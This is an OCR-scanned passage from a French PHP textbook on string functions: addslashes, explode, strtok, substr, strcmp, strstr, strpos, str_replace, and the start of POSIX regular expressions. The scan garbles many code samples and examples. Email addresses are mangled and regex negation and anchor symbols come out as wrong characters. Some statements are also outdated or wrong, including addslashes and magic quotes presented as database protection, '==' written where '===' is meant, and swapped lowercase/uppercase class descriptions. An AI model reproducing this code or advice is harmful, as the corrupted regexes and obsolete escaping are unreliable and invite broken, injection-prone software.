deuxieme partie, nous traiterons des maintenant de la mise en forme des chames en vue 
de leur stockage dans une base. 

Certains caracteres dont la presence est autorisee au sein d'une chame peuvent se reve- 
ler une source de probleme, particulierement lors de 1' insertion des donnees dans une 
base de donnees. Une base de donnees interprete en effet certains caracteres comme des 
caracteres de controle. Les caracteres les plus problematiques sont les apostrophes 
(simples et doubles), les barres obliques inversees (\) et le caractere NULL. 

II est par consequent necessaire de marquer, ou de "proteger", ces caracteres, de sorte 
qu'une base de donnees telle que MySQL les traite en tant que caracteres litteraux et 
non pas comme des sequences de controle. Pour proteger ces caracteres, il suffit de les 
faire preceder d'une barre oblique inversee. Par exemple, le caractere " (apostrophe 
double) doit etre note sous la forme \" (barre oblique inversee apostrophe double) et le 
caractere \ (barre oblique inversee) doit etre represente par \ \ (deux barres obliques 
inversees successives). 
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Notez que cette regie s'applique a tous les caracteres speciaux. Par consequent, si votre 
chaine contient la sequence \ \ , vous devez enregistrer celle-ci sous la forme \ \ \ \ . 

PHP offre deux fonctions specialement dediees a la protection des caracteres. Avant 
d'ecrire une chaine dans une base de donnees, vous devez reformater celle-ci avec la 
fonction addslashes( ), comme dans l'exemple suivant, a moins que votre configuration 
ne le fasse par defaut : 

$commentaire = addslashes (trim($_POST[ ' commentaire ' ] ) ) ; 

Comme nombre d'autres fonctions de traitement de chaines, la fonction addslashes () 
prend une chaine en parametre et renvoie la chaine reformatee. 

La Figure 4.3 illustre les transformations realisees par ces fonctions sur les chaines. 

Vous pouvez tester ces fonctions sur votre serveur et obtenir un resultat qui ressemble 
plus a celui de la Figure 4.4. 



Figure 4.3 

Apres traitement par la fonction 
addslashes(), toutes les apostrophes 
sont precedees d'une barre oblique. 
La fonction stripslashes() elimine 
toutes les barres obliques servant 
de caractere d'echappement. 



Mozilla Firefox 

( ■* I ■■ > (e) (x) CUT ^pv/i^v ) - (EET^ ) dD O* 



Avant addslashes() 

Jc dis "Bravo pour votre initiative". Qu'est-ce quee'est pratique ! 

Apres addslashesQ 

Jc dis Y r Bravo pour votre imtiativc\". QuVcst-cc que c\'cst pratique ! 

Apres stripslashesQ 

Jc dis "Bravo pour votre initiative" . Qu'cst-cc que e'est pratique ! 



Figure 4.4 

Tous les caracteres problematiques 
ont ete proteges deux fois ; cela 
signifie que la fonction des apostro- 
phes magiques est activee. 



Mozilla Firefox CD 

O I ■- Ce) CLT^p^/">i4- T ) ■ C rSTo ) (M) ®- 



Avant addslashes() 

Jc dis VBravo pour votre ijiitiati vc\" . Qu\'cst-cc que c\'cst pratique ! 

Apres addslashesQ 

Jc dis WV'Bravo pour votre irihiativcW . Qu\\\'est-cc que cWVest pratique ! 

Apres stripslashesQ 

Jc dis \ lr Bravo pour votre initiativcY'. QuVcst-ce que c\'est pratique ! 
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Si vous voyez ce resultat, cela signifie que votre configuration de PHP est dermic de 
maniere a ajouter et a supprimer les barres obliques automatiquement. Cette capacite 
est controlee par la directive de configuration magic quotes gpc, qui est activee par 
defaut dans les nouvelles versions de PHP Les lettres gpc correspondent a GET, POST et 
cookie. Cela signifie que les variables provenant de ces sources sont automatiquement 
mises entre apostrophes. Vous pouvez verifier si cette directive est activee dans votre 
systeme en utilisant la fonction get magic quotes gpc (), qui renvoie true si les chai- 
nes provenant de ces sources sont automatiquement placees entre apostrophes. Si cette 
directive est activee sur votre systeme, vous devez appeler stripslashes ( ) avant 
d'afficher les donnees utilisateur ; sans cela, les barres obliques seront affichees. 

L'utilisation des guillemets magiques vous permet d'ecrire du code plus portable. Pour 
en apprendre plus sur cette fonction, consultez le Chapitre 22. 

Fusion et scission de chaines au moyen des fonctions de traitement 
de chaine 

II apparait souvent necessaire d'examiner et de traiter certaines parties d'une chaine 
separement du reste de la chaine. Par exemple, on peut souhaiter examiner les mots 
d'une phrase (afin d'en verifier l'orthographe) ou scinder un nom de domaine ou une 
adresse de courrier electronique en ses differentes composantes. PHP met a votre dispo- 
sition plusieurs fonctions de traitement de chaine (et une fonction de traitement 
d'expression reguliere) permettant d'operer ce type de manipulation. 

Dans le cadre de notre application modele, supposez que Bob veuille recevoir person- 
nellement tous les messages des clients provenant de grosclient.com. Pour exhaucer son 
souhait, il suffit de decomposer 1' adresse de courrier electronique fournie par les clients 
et d'examiner si elle contient la sous-chaine grosclient . com. 

Utilisation des fonctions explodeQ, implodeQ et joinQ 

explode ( ) est la premiere fonction que nous pouvons mettre en oeuvre pour atteindre 
notre objectif. Son prototype est le suivant : 

array explode(string separateur, string entree [, int limite]); 

Cette fonction prend une chaine comme deuxieme parametre (entree) et decoupe celle- 
ci en se servant du separateur (de type chaine) indique en premier parametre. Les 
differentes sous-chaines ainsi obtenues sont renvoyees dans un tableau. Vous pouvez 
limiter le nombre d'elements ainsi produits avec le parametre facultatif limite. 

Dans le cadre de notre application modele, nous pouvons extraire le nom de domaine de 
1' adresse de courrier electronique du client grace au code suivant : 

$tab_email = explode('@', $email); 
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L' execution de cette ligne de code decoupe l'adresse de courrier electronique du client 
en deux parties : le nom d'utilisateur, qui est enregistre dans $tab email[0], et le nom 
de domaine, qui est enregistre dans $tab email [ 1 ] . 

Nous pouvons alors identifier l'origine du client en testant le nom de domaine. Ne reste 
plus ensuite qu'a transmettre le message saisi par le client a la personne appropriee : 

if ($tab_email[ 1 ] == "grosclient.com") { 

$adresse_dest = "bobiaexemple.com"; 
} else { 

$adresse_dest = "commentairesiaexample.com"; 

} 

Notez que, si le nom de domaine n'est pas entierement defini en lettres minuscules, le 
code precedent ne conduira pas au resultat recherche. Pour eviter ce probleme, nous 
devons d'abord convertir le nom de domaine en majuscules, ou bien en minuscules, 
avant d'effectuer notre test : 

if (strtolower($tab_email[1 ] ) == "grosclient.com") { 

$adresse_dest = "bob@exemple.com"; 
} else { 

$adresse_dest = "commentairesiaexemple.com"; 

} 

L'effet produit par la fonction explode ( ) peut etre annule avec les fonctions implode ( ) 
ou join( ). Ces deux fonctions sont identiques (ce sont des alias l'une de 1' autre). Par 
exemple, la ligne de code : 

$nouveau_email = implode( '@' , $tab_email); 

reassemble tous les elements du tableau $tab email en les reliant par la chaine passee 
en premier parametre. Cet appel de fonction est done tres semblable a celui de la fonction 
explode ( ) mais il produit le resultat oppose. 

Utilisation de la fonction strtokQ 

Contrairement a la fonction explode ( ) , qui decompose en une seule fois une chaine en 
differentes parties, la fonction strtok( ) extrait une a une les differentes parties d'une 
chaine (lesquelles sont appelees des token, terme pouvant etre traduit par "lexeme")- La 
fonction strtok() est done une alternative interessante a la fonction explode () 
lorsqu'il s'agit de traiter un par un les mots d'une chaine de caracteres. 

Le prototype de la fonction strtok( ) est le suivant : 

string strtok(string entree, string separateur) ; 

Le parametre separateur peut etre soit un caractere individuel, soit une chaine de 
caracteres. La chaine entree sera scindee au niveau de chacun des caracteres specifies 
dans le separateur et non pas au niveau des occurrences de la chaine separateur 
complete (comme e'est le cas avec explode). 
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L'appel de strtok( ) n'est pas aussi simple que le laisse penser son prototype. 

Pour obtenir le premier segment d'une chaine, appelez la fonction strtok() en lui 
passant la chaine a decomposer et le separateur a utiliser. Pour obtenir les maillons 
suivants, il suffit de passer un seul parametre : le separateur. La fonction strtok() 
conserve en effet un pointeur interne sur la chaine qui lui a ete passee en parametre. 
Pour reinitialiser le pointeur de strtok( ), appelez strtok( ) en indiquant a nouveau le 
parametre entree. 

Voici un exemple typique d'utilisation de la fonction strtok( ) : 

$mot = strtok($commentaire, " "); 
echo $mot . "<br />" ; 
while ($mot ! = "") { 

$mot = strtok(" " ) ; 

echo $mot . "<br />" ; 

}; 

Comme nous l'avons deja mentionne, il serait fortement conseiile, ici, de verifier que le 
client a bien rempli les champs du formulaire de message, par exemple au moyen de la 
fonction empty ( ) . Ce test n'est pas implemente dans les exemples de code donnes dans 
ce chapitre, par souci de concision. 

Le code precedent affiche chaque mot du message saisi par le client sur une ligne 
distincte et poursuit le traitement jusqu'a ce qu'il n'y ait plus de mot. Les chaines vides 
sont automatiquement ignorees. 

Utilisation de la fonction substrQ 

La fonction substr ( ) permet d'acceder a une sous-chaine d'une chaine en indiquant le 
debut et la fm de la sous-chaine. Dans le cadre de 1' exemple considere ici, cette fonction 
n'a guere d'utilite, mais elle se revele precieuse lorsqu'il faut traiter des parties de chaines 
ayant un format bien determine. 

La fonction substr ( ) s' utilise avec le prototype suivant : 

string substr(string chaine, int debut, int [longueur] ); 

La fonction substr( ) renvoie une sous-chaine extraite de la chaine chaine passee en 
parametre. 

Pour illustrer 1' usage de cette fonction, considerons 1' exemple de chaine suivant : 

$test = "Votre service client est parfait"; 

Si la fonction substr ( ) est appelee en specifiant uniquement un nombre positif comme 
argument debut, vous obtiendrez la sous-chaine comprise entre la position debut et la 
fin de la chaine. Par exemple, l'execution de l'instruction : 

substr($test, 1); 
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renvoie "otre service client est parf ait". Notez que les positions dans la chaine 
sont numerotees a partir de 0, comme dans les tableaux. 

Lorsque la fonction substr ( ) est appelee en specifiant uniquement un nombre negatif 
comme argument debut, vous obtenez la sous-chaine comprise entre la fin de la chaine 
moins "longueur caracteres" et la fin de la chaine. Par exemple, l'execution de 
l' instruction : 

substr($test, -7); 

renvoie la sous-chaine "parf ait". 

Le parametre longueur permet d'indiquer soit le nombre des caracteres a renvoyer (si 
longueur est un nombre positif), soit le caractere final de la sous-chaine (si longueur 
est un nombre negatif). Par exemple : 

substr($test , 0, 5); 

renvoie les cinq premiers caracteres de la chaine, c'est-a-dire "Votre". La ligne de code 
suivante : 

echo substr($test, 6, -13); 

retourne la sous-chaine comprise entre le septieme caractere et le treizieme caractere 
compte a partir de la fin de la chaine, c'est-a-dire "service client". Le premier carac- 
tere etant l'emplacement 0, l'emplacement 6 correspond done au septieme caractere. 

Comparaison de chames 

Jusqu' a present, les seules comparaisons de chaines que nous avons faites se sont limi- 
tees au test de l'egalite entre deux chaines, au moyen de l'operateur ==. PHP permet 
d'effectuer des comparaisons plus sophistiquees que nous classerons en deux catego- 
ries : les correspondances partielles et les autres. Nous commencerons par etudier ces 
dernieres, puis nous examinerons dans un second temps les correspondances partielles, 
dont nous aurons besoin pour poursuivre le developpement de notre application 
modele. 

Comparaison des chaines : strcmpO, strcasecmpO et strnatcmpO 

Ces fonctions permettent d'ordonner des chaines les unes par rapport aux autres. Elles 
sont precieuses lors du tri de donnees. 

Le prototype de la fonction strcmp( ) est le suivant : 

int strcmp( string chainel , string chaine2); 

La fonction strcmp ( ) compare les deux chaines qui lui sont passees en parametre et renvoie 
si elles sont egales, un nombre positif si chainel vient apres (ou est superieure a) 
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chaine 2 dans l'ordre lexicographique et un nombre negatif dans le cas contraire. Cette 
fonction est sensible a la casse. 

La fonction strcasecmp( ) est identique a strcmp( ), sauf qu'elle n'est pas sensible a la 
casse. 

La fonction strnatcmp( ) et son homologue non sensible a la casse strnatcasecmp( ) 
comparent les chaines d'apres l'ordre "naturel", plus proche du comportement humain. 
Par exemple, la fonction strcmp() classerait la chaine "2" apres la chaine "12", parce 
que cette derniere est superieure d'un point de vue lexicographique. En revanche, la 
fonction strnatcmp() effectuerait le classement inverse. Vous trouverez plus d'infor- 
mations sur la notion d'ordre naturel sur le site http://www.naturaIordersort.org/. 

Longueur d'une chaine : la fonction strlen() 

Nous pouvons tester la longueur d'une chaine en faisant appel a la fonction strlen( ). 
Celle-ci renvoie la longueur de la chaine qui lui est passee en parametre. L appel 
suivant, par exemple, affichera 7 : 

echo strlen( "bonjour" ) ; 

strlen( ) permet de valider les donnees saisies par l'utilisateur. Par exemple, conside- 
rons le cas de l'adresse de courrier electronique entree dans notre exemple de formu- 
laire et stockee dans la variable $email. Une des methodes de base de validation des 
adresses de courrier electronique consiste a tester leur longueur. Une adresse de cour- 
rier electronique valide doit compter au moins six caracteres (a@a.fr, par exemple), 
dans le cas minimaliste d'une adresse se composant d'un code de pays sans deuxieme 
niveau de domaine, d'un nom de serveur d'un seul caractere et d'une adresse e-mail 
d'une seule lettre. On pourrait done produire un message d'erreur si l'adresse saisie n'a 
pas au moins cette longueur : 

if (strlen($email) < 6) { 
echo "Cette adresse email est incorrecte. " ; 
exit; // Fin de l'execution du script PHP 

} 

II s'agit bien sur d'une methode simpliste de validation de 1' information. Nous en 
verrons de meiileures dans la prochaine section. 

Recherche et remplacement de sous-chaines avec les fonctions 
de traitement de chaines 

On a souvent besoin de verifier la presence d'une sous-chaine determinee dans une 
chaine plus longue. Ce type de correspondance partielle est souvent plus utile qu'un 
simple test d'egalite. 
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Dans notre exemple de formulaire, nous devons determiner si le message contient 
certains mots-cles pour en deduire le service vers lequel il doit etre dirige. Si nous 
souhaitons, par exemple, diriger tous les e-mails ou il est question des boutiques de Bob 
vers le responsable du reseau de distribution, nous pouvons rechercher les occurrences 
du mot "boutique" (ou ses derives) dans les messages. 

Pour faire cette selection, nous disposons des fonctions explode () ou strtok() deja 
etudiees. Celles-ci permettent de recuperer des mots dans les messages que nous pourrons 
ensuite comparer a l'aide de l'operateur d'egalite ou de la fonction strcmp ( ) . 

PHP nous offre toutefois la possibility d'aboutir au meme resultat via un seul appel 
d'une des fonctions de recherche de chaines ou d'expressions regulieres. Ces fonctions 
servent a rechercher la presence d'un motif donne dans une chaine de caracteres. Nous 
allons a present passer en revue chacun de ces jeux de fonctions. 

Recherche de sous-chaTnes dans des chaTnes : strstrQ, strchrQ, strrchrQ 
et stristrQ 

Pour tester la presence d'une chaine dans une autre chame, vous pouvez utiliser l'une 
ou l'autre des fonctions strstr ( ), strchr ( ), strrchr ( ) ou stristr( ). 

La fonction strstr () est la plus generique et peut etre utilisee pour rechercher une 
correspondance entre une sous-chaine ou un caractere et une chaine plus longue. En 
PHP, la fonction strchr() est identique a la fonction strstr (), bien que son nom 
suggere qu'elle sert a rechercher un caractere au sein d'une chaine (ce qui est bien le 
cas en C). En realite, la fonction strchr ( ) de PHP permet tout autant de rechercher un 
caractere qu'une chaine de caracteres au sein d'une autre chaine. 

Le prototype de strstr ( ) est le suivant : 

string strstr(string botte_de_foin , string aiguille); 

La fonction strstr( ) recherche dans la botte de foin qui lui est passee comme 
premier parametre s'il existe F aiguille qui lui est fournie en deuxieme parametre. 
Lorsque strstr () etablit une correspondance exacte entre Vaiguille et la 
botte de foin, elle renvoie la partie de la botte de foin a partir de 1' aiguille loca- 
lisee. Dans le cas contraire, strstr( ) renvoie false. Lorsque plusieurs occurrences de 
la sous-chaine recherchee sont detectees, strstr () renvoie la partie de la chaine qui 
commence a la premiere occurrence de V aiguille. 

Par exemple, dans le cadre de notre application modele, nous pouvons choisir le desti- 
nataire vers lequel un message recu doit etre dirige a l'aide du code suivant : 

$adresse_dest = "commentaires@exemple.com"; // la valeur par defaut 

// Modifie $adresse_dest si le critere de selection est satisfait 
if (strstr($commentaire, "boutique")) { 
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$adresse_dest = "distributioniaexemple.com"; 
} else if (strstr($commentaire, " livraison " ) ) { 

$adresse_dest = "livraisoniaexemple.com"; 
} else if (strstr($commentaire, "facture")) { 

$adresse_dest = "comptes@exemple.com"; 

} 

Ce code examine si le message contient certains mots-cles et transmet l'e-mail a la 
personne appropriee. Si, par exemple, le message d'un client contient la phrase "Je n'ai 
pas encore recu la facture de ma derniere commande", la chaine "facture" sera detectee et 
le message sera transmis a comptes@exemple . com. 

II existe deux variantes de la fonction strstr( ). La premiere, stristr ( ), est presque 
identique a strstr ( ) , sauf qu'elle n'est pas sensible a la casse. Elle serait tres utile dans 
l'exemple considere ici, puisque le client est susceptible de saisir "facture", "Facture", 
"FACTURE" ou tout autre melange de minuscules et de majuscules pour ce mot. 

La deuxieme variante de la fonction strstr ( ) est strrchr( ), qui est elle aussi quasi- 
ment identique a strstr(), sauf qu'elle renvoie la botte de foin a partir de la 
derniere occurrence de V aiguille. 

Determination de la position d'une sous-chame dans une chaine : 
strposQ et strrposQ 

Les fonctions strpos( ) et strrpos( ) operent de maniere comparable a strstr( ), sauf 
qu'elles renvoient la position numerique de V aiguille dans la botte de foin au lieu 
de renvoyer une sous-chaine. Fait interessant, le manuel de PHP recommande a present 
d'utiliser strpos() au lieu de strstr() pour verifier la presence d'une sous-chaine 
dans une chaine, car elle s' execute plus rapidement. 

Le prototype de la fonction strpos( ) est le suivant : 

int strpos(string botte_de_foin , string aiguille, int [offset] ); 

Le nombre entier renvoye par cette fonction donne la position de la premiere occur- 
rence de V aiguille dans la botte de foin. Comme d'habitude, le premier caractere 
occupe la position 0. 

Le code qui suit affichera done 1 dans la fenetre du navigateur : 

$test = "Bonjour a tous"; 
echo strpos($test, 'o'); 

Dans ce cas, V aiguille n'est constitute que d'un seul caractere, mais il pourrait s'agir 
d'une chaine de n'importe quelle longueur. 

Le parametre facultatif offset permet d'indiquer la position a partir de laquelle 
commencera la recherche dans la botte de foin. La ligne de code suivante : 

echo strpos($test, 'o', 5); 
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afficherait done 1 1 dans le navigateur, car PHP commencerait la recherche du caractere 
"o" a partir de la position 5 et ne considererait par consequent ceux qui sont situes aux 
positions 1 et 4. 

La fonction strrpos() est quasiment identique a la fonction strpos(), sauf qu'elle 
retourne la position de la derniere occurrence de V aiguille dans la botte de foin. 

Les fonctions strpos() et strrpos() renvoient false si elles ne trouvent aucune 
occurrence de Vaiguille dans la botte de foin. Ce comportement peut se reveler 
problematique car, dans un langage faiblement type comme PHP, false est equivalent 
a 0, qui designe egalement la position du premier caractere dans une chaine. 

Pour eviter toute confusion, utilisez l'operateur == pour tester les valeurs renvoyees : 

$resultat = strpos($test, 'B'); 
if ($resultat === false) { 

echo "Non trouve" ; 
} else { 

echo "Trouve a la position 0"; 

} 

Substitution de sous-chaines : str_replace() et substr_replace() 

La fonctionnalite de recherche/remplacement peut se reveler extremement utile dans le 
traitement des chaines. Elle permet de personnaliser les documents produits par PHP 
(on peut, par exemple, utiliser une procedure de recherche/remplacement pour 
remplacer <nom> par un nom de personne et <adresse> par l'adresse de la personne 
consideree). Elle permet egalement de censurer certains termes, par exemple dans le 
contexte d'une application de forum de discussion, voire d'une application de formu- 
laire "intelligent". 

La encore, PHP offre un jeu de fonctions specifiques pour le traitement des chaines ou 
des expressions regulieres. 

st r replace ( ) est la fonction de traitement de chaine la plus utilisee pour le remplacement. 
Son prototype est le suivant : 

string str_replace(string aiguille, string nouvelle_aiguille, 
string botte_de_foin[ , int &nombre])) ; 

La fonction str replace () remplace dans la chaine botte de foin toutes les occur- 
rences de la sous-chaine aiguille par la sous-chaine nouvelle aiguille et renvoie la 
nouvelle version de la botte de foin. 
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Le quatrieme parametre facultatif, nombre, contient le nombre de remplacements 
effectues. 

— Info 

Vous pouvez passer tous les parametres sous la forme d'un tableau ; la fonction 
str replace () agira de maniere remarquablement intelligente. Vous pouvez passer un 
tableau contenant les mots a remplacer, un tableau des mots en remplacement (en corres- 
pondance avec le premier) et un tableau des chaines auxquelles appliquer ces regies. La 
fonction renverra alors un tableau des chaines modifiees. 



Dans le cadre de notre formulaire de courrier electronique, par exemple, les clients 
pourraient glisser des termes injurieux dans leurs messages. Nous pouvons eviter aux 
divers services de l'entreprise de Bob d'etre importunes par de tels messages en utili- 
sant un tableau $injures contenant les mots injurieux que vous souhaitez censurer. 
Voici un exemple utilisant str replace ( ) avec un tableau : 

$commentaire = str_replace ($inj ures , "%!@*", $commentaire) ; 

La fonction substr replace ( ) permet de rechercher et de remplacer une sous-chaine 
particuliere dans une chaine. Son prototype est le suivant : 

string substr_replace(string chaine, string remplacement, int debut, int [longueur] ); 

Cette fonction remplace une partie de la chaine chaine par la chaine remplacement. Les 
valeurs des parametres debut et longueur definissent la partie a remplacer. 

La valeur de debut represente un offset (ou decalage) a partir duquel entreprendre le 
remplacement dans chaine. Si la valeur de debut est positive ou nulle, l'offset est defini 
a partir du debut de la chaine ; si elle est negative, l'offset est defini a partir de la fin de 
la chaine. Par exemple, la ligne de code qui suit remplace le dernier caractere de la 
chaine $test par un X : 

$test = substr_replace($test, 'X', -1); 

Le parametre longueur est facultatif et indique la position dans la chaine ou PHP doit 
stopper le remplacement. Lorsque cet argument n'est pas fourni, la chaine est remplacee a 
partir de la position debut jusqu'a la fin de la chaine. 

Si longueur vaut zero, la chaine de remplacement est inseree dans chaine sans ecraser 
la chaine existante. 

Si longueur a une valeur positive, il indique le nombre de caracteres qui doivent etre 
remplaces par nouvelle chaine. 

Si longueur a une valeur negative, il indique la position a partir de laquelle doit s'inter- 
rompre le remplacement, comptee a partir de la fin de chaine. 
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Introduction aux expressions regulieres 

PHP reconnait deux styles de syntaxe pour les expressions regulieres : POSIX et Perl. 
Ces deux types sont integres par defaut dans PHP et, a partir de la version 5.3, les 
expressions regulieres Perl (PCRE ou Perl-Compatible Regular Expression) ne peuvent 
plus etre desactivees. Nous presenterons ici le style POSIX car c'est le plus simple ; si 
vous connaissez deja Perl ou que vous vouliez en savoir plus sur PCRE, consul tez le 
manuel en ligne, publie a l'URL http://www.manuelphp.com/php/ref.pcre.php. 

— Info 

Les expressions regulieres POSIX sont d'un apprentissage plus simple mais elles ne sont pas 
compatibles avec les donnees binaires. 



Toutes les operations de correspondance de motifs realisees jusqu'ici ont fait appel 
aux fonctions sur les chaines, qui nous ont limites a la recherche de correspondances 
exactes sur des chaines ou des sous-chaines. Pour realiser des operations de corres- 
pondance plus sophistiquees, vous devez employer les expressions regulieres. Leur 
apprentissage n'est pas aise, mais elles sont d'un secours appreciable en certaines 
circonstances. 

Notions de base 

Une expression reguliere est un moyen de decrire un motif dans un morceau de texte. 
Les correspondances exactes (ou litterales) realisees dans les sections precedentes 
etaient une forme d'expressions regulieres. Par exemple, avec "boutique" et "livraison", 
nous avons effectue une recherche a l'aide d'expressions regulieres. 

En PHP, la recherche de correspondances avec des expressions regulieres s'apparente 
plus a une recherche de correspondances avec la fonction strstr ( ) qu'a une comparai- 
son d'egalite, parce qu'il s'agit de rechercher l'occurrence d'une sous-chaine dans une 
autre chaine (la sous-chaine pouvant se situer n'importe ou dans la chaine, a moins d'en 
definir plus precisement l'emplacement). Par exemple, la chaine "boutique" corres- 
pond a l'expression reguliere "boutique", mais elle correspond egalement aux expressions 
regulieres "o", "ou", etc. 

Outre les caracteres qui se correspondent exactement, vous pouvez utiliser des caracteres 
speciaux pour ajouter une metasignification a un motif. Vous pouvez, par exemple, utiliser 
des caracteres speciaux pour indiquer que le motif recherche doit se trouver en debut ou 
a la fin d'une chaine, qu'une partie du motif peut etre repetee, ou bien encore que 
certains caracteres du motif doivent etre d'un type particulier. Vous pouvez egalement 
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rechercher des occurrences litterales de caracteres speciaux. Nous allons nous pencher 
sur chacune de ces possibilites. 

Ensembles et classes de caracteres 

La possibility d'utiliser des ensembles de caracteres, au lieu de simples expressions 
exactes, dans les expressions regulieres confere a celles-ci plus de puissance pour les 
operations de recherche. Les ensembles de caracteres permettent en effet de rechercher 
des correspondances sur tous les caracteres d'un type particulier, un peu a la maniere 
d'un joker. 

Tout d'abord, le caractere point (.) peut servir de joker pour representer n'importe quel 
caractere unique, sauf le caractere de nouvelle ligne (\n). Lexpression reguliere : 

.ou 

permet de realiser des correspondances sur les chaines "cou", "pou" ou "sou" (entre 
autres). Ce type de joker s'emploie souvent pour realiser des correspondances sur des 
noms de fichiers dans les systemes d'exploitation. 

Avec les expressions regulieres, vous pouvez etre encore plus precis sur le type du 
caractere a rechercher. Vous pouvez meme definir un ensemble de caracteres auquel le 
caractere recherche devra appartenir. Dans l'exemple precedent, 1' expression reguliere 
correspondait a "cou" et a "pou", mais elle pouvait egalement capturer "#ou". Pour 
preciser que le caractere a capturer doit etre une lettre comprise entre a et z, vous 
pouvez utiliser la formulation suivante : 

[a-z] 

La paire de crochets, [ et ], definit une classe de caracteres, c'est-a-dire un ensemble 
de caracteres auquel doit appartenir le caractere recherche. Notez que 1' expression entre 
les deux crochets ne permet de capturer qu'un seul caractere. 

Vous pouvez definir un ensemble de caracteres sous la forme d'une liste, comme ici : 
[aeiou] 

Cette expression indique que le caractere recherche doit etre une voyelle. 

Vous pouvez egalement preciser une plage de caracteres en utilisant des tirets, comme dans 
l'expression [a z ] , ou un ensemble de plages de caracteres, de la maniere suivante : 

[a-zA-Z] 

Cette expression precise que le caractere recherche doit etre une lettre majuscule ou 
minuscule. 

Les ensembles peuvent aussi servir a indiquer que le caractere sur lequel realiser la 
correspondance ne doit pas appartenir a un ensemble. Par exemple : 

['a-z] 
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capture tout caractere qui n'est pas compris entre a et z. L' accent circonflexe place 
entre les crochets est synonyme de negation. En dehors des crochets, il prend une autre 
signification sur laquelle nous reviendrons un peu plus loin. 

Outre la possibilite de definir vos ensembles et classes de caracteres sous forme de 
listes, vous disposez de plusieurs classes de caracteres predefinies, qui sont decrites 
dans le Tableau 4.3. 



Tableau 4.3 : Classes de caracteres utilisables dans des expressions regulieres de style 
POSIX 



Classe 


Correspondance 


[ [ :alnum: ] ] 


Caracteres alphanumeriques 


[ [ :alpha: ] ] 


Caracteres alphabetiques 


[ [ : lower: ] ] 


Lettres en majuscules 


[ [ : upper: ] ] 


Lettres en minuscules 


[ [ : digit : ] ] 


Chiffres decimaux 


[ [ : xdigit : ] ] 


Chiffres hexadecimaux 


[ [ : punct : ] ] 


Ponctuations 


[ [ : blank : ] ] 


Tabulations et espaces 


[ [ : space : ] ] 


Espaces 


[ [ : cntrl : ] ] 


Caracteres de controle 


[ [ : print : ] ] 


Tous les caracteres affichables 


[ [ : graph : ] ] 


Tous les caracteres affichables, sauf le caractere espace 



Repetition 

Lors d'une recherche, il arrive frequemment qu'il soit necessaire d'indiquer que le 
motif recherche peut etre une chaine particuliere ou une classe de caracteres repetee 
plusieurs fois. Pour representer une telle repetition, il suffit d'utiliser deux caracteres 
speciaux dans 1' expression reguliere. Le symbole * indique que le motif peut etre repete 
zero ou plusieurs fois, tandis que le symbole + indique que le motif peut etre repete une 
ou plusieurs fois. Le symbole doit etre specific directement apres la partie de 1' expression 
a laquelle il s' applique. Par exemple : 

[ [ :alnum: ] ]+ 

signifie "au moins un caractere alphanumerique". 
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Sous-expressions 

II est souvent tres utile de pouvoir decouper une expression en sous-expressions, pour, 
par exemple, signifier "au moins une de ces chaines suivie par exactement une autre". 
L'usage de parentheses permet de decouper une expression reguliere, exactement 
comme les expressions arithmetiques. Par exemple : 

(tres )*grand 

correspond a "grand", "tres grand", 'tres tres grand", et ainsi de suite. 
Denombrement de sous-expressions 

Vous pouvez indiquer le nombre de repetitions d'une sous-expression au moyen d'une 
expression numerique placee entre accolades ({ }). Vous avez ainsi la possibility d'indi- 
quer un nombre determine de repetitions ({3}), une plage de repetitions ({2 , 4} signifie 
de 2 a 4 repetitions), ou bien encore une plage de repetition ouverte ({2, } signifie au 
moins deux repetitions). 

Par exemple : 
(tres ){1, 3} 

correspond a "tres ", "tres tres "et"tres tres tres". 
Ancrage au debut ou a la fin d'une chaTne 

Le motif [a z] capturera n'importe quelle chaine contenant un caractere alphabetique 
en minuscule. Peu importe que la chaine fasse un caractere de long ou contienne un 
unique caractere correspondant dans une chaine plus longue. 

Vous pouvez preciser qu'une sous-expression particuliere doit apparaitre en debut et/ou 
a la fin de la chaine exploree. Cette possibility se revele precieuse pour s'assurer que 
seule 1' expression recherchee, et aucune autre, n'apparaitra dans la chaine trouvee. 

Le symbole accent circonflexe ( A ) s' utilise en debut d' expression reguliere pour indi- 
quer que le motif recherche doit figurer au debut de la chaine exploree. Inversement, le 
symbole $ s'utilise en fin d'expression reguliere pour indiquer que le motif recherche 
doit figurer a la fin de la chaine exploree. 

Par exemple, 1' expression reguliere : 
"bob 

capture bob en debut d'une chaine, tandis que : 
com$ 

capture com a la fin d'une chaine. 
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Enfin, l' expression : 
A [a-z]$ 

correspond a n'importe quelle chaine contenant uniquement un caractere compris entre 
a et z. 

Branchement 

Pour representer un choix dans une expression reguliere, utilisez une barre verticale ( | ). 
Pour, par exemple, rechercher com, edu ou net, nous pouvons utiliser l'expression : 

(com) | (edu) | (net) 
Recherche litterale de caracteres speciaux 

Pour rechercher un des caracteres speciaux mentionnes dans les precedentes sections, 
tels que ., {, ou $, vous devez le faire preceder d'une barre oblique inversee (\). Pour 
representer litteralement une barre oblique inversee, vous devez done la doubler ( \ \ ) . 

Veillez a placer vos motifs d' expression reguliere dans des chaines entre apostro- 
phes simples car 1' utilisation d' apostrophes doubles entraine des complications 
inu tiles. 

En effet, rappelez-vous que, pour representer une barre oblique inversee dans une 
chaine entre apostrophes doubles, vous devez utiliser deux barres obliques inversees. 
Une chaine PHP entre apostrophes doubles qui represente une expression reguliere 
contenant une barre oblique inversee litterale necessitera done quatre barres obliques 
inversees. PHP analysera ces quatre barres obliques inversees comme s'il s'agissait de 
deux barres obliques inversees. Puis l'interpreteur d'expressions regulieres analysera a 
son tour les deux barres obliques inversees comme s'il s'agissait d'une seule barre oblique 
inversee. 

Le signe dollar est egalement un caractere special a la fois dans les chaines PHP entre 
apostrophes doubles et dans les expressions regulieres. Pour capturer un $ litteral avec 
un motif, vous devez utiliser la sequence " \ \ \$". Cette chaine se trouvant entre guille- 
mets, PHP l'analysera comme correspondant a \$, que l'interpreteur d'expression regu- 
liere interpretera ensuite comme un simple signe dollar. 

Recapitulatif sur les caracteres speciaux 

Les Tableaux 4.4 et 4.5 presentent un recapitulatif des caracteres speciaux. Le 
Tableau 4.4 donne la signification des caracteres speciaux, utilises en dehors de paires 
de crochets. Le Tableau 4.5 donne la signification des caracteres speciaux lorsque ceux- 
ci sont places entre crochets. 
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Tableau 4.4 : 


: Recapitulatif des caracteres speciaux utilises dans des expressions regulieres 


POSIX, en dehors des crochets 


Caractere 


Signification 


\ 


Caractere de protection 




Correspondance en debut de chaine 


$ 


Correspondance en fin de chaine 




Correspond a tout caractere, sauf le caractere de nouvelle ligne (\n) 


1 


Debut d'un autre choix (se lit comme OU) 


( 


Debut d'un sous-motif 


) 


Fin d'un sous-motif 


* 


Repetition ou plusieurs fois 


+ 


